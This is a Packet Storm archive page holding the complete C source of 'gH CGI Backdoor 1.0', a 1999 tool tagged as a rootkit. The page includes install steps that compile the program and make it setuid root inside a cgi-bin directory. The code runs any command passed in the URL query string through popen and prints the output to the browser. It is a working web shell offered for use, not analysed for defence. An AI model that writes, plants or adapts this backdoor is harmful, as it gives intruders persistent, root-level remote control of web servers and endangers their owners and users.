exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

gH-cgi.c

gH-cgi.c
Posted May 1, 1999
Authored by Blasphemy

A simple cgi backdoor which pipes command output to the browser.

tags | tool, cgi, rootkit
systems | unix
SHA-256 | 49a76eb2a7777609ec2149ffb2129d630e9f7f62a55569ae936b519c74e089d3

gH-cgi.c

Change Mirror Download
/*
* gH CGI Backdoor 1.0
*
* Install:
* -------------------------------
* % gcc -o gH.cgi gH-cgi.c
* % chown root.root gH.cgi
* % chmod 4755 gH.cgi
* -------------------------------
* Tested with apache 1.3.4
*
* Note: place gH.cgi in a cgi-bin directory
*
* blasphemy (cornoil@netscape.net)
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TITLE "gH CGI Backdoor"

char x2c(char *what);
int header();
int footer();

int
main() {
FILE *out;
char *qs = (char *)malloc(256);
int x = 0, i = 0, c = 0, f = 0;
qs = getenv("QUERY_STRING");
if (qs != NULL) {
for (x = 0, i = 0; qs[i]; x++, i++) {
if ((qs[x] = qs[i]) == '%') {
qs[x] = x2c(&qs[i + 1]);
i += 2;
}
}
qs[x] = '\0';
for (x = 0; qs[x]; x++) {
if (qs[x] == '+') {
qs[x] = ' ';
}
}
header(qs);
out = popen(qs, "r");
if (out != NULL) {
while (c != EOF) {
c = fgetc(out);
if (c != EOF && c != '\0') {
printf("%c", (char) c);
f++;
}
}
pclose(out);
}
if (f == 0 && strcmp(qs, "") != 0)
printf("gH: %s: command not found\n", qs);
}
footer();
return(0);
}

char x2c(char *what)
{
register char digit;

digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return (digit);
}

int
header(char *qs) {
printf("Content-type: text/html\n\n");
printf("<html>\n<head><title>%s</title></head>\n", TITLE);
printf("<body bgcolor=\"#ffffff\">\n");
printf("<dir><h1>%s</h1>\n", TITLE);
printf("<ISINDEX prompt=\"Command to Execute: \">\n");
printf("<br><b>Command output:</b> [<em>%s</em>]\n", qs);
printf("<br><pre>\n");
}

int
footer() {
printf("</pre>\n</dir>\n</body></html>\n");
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close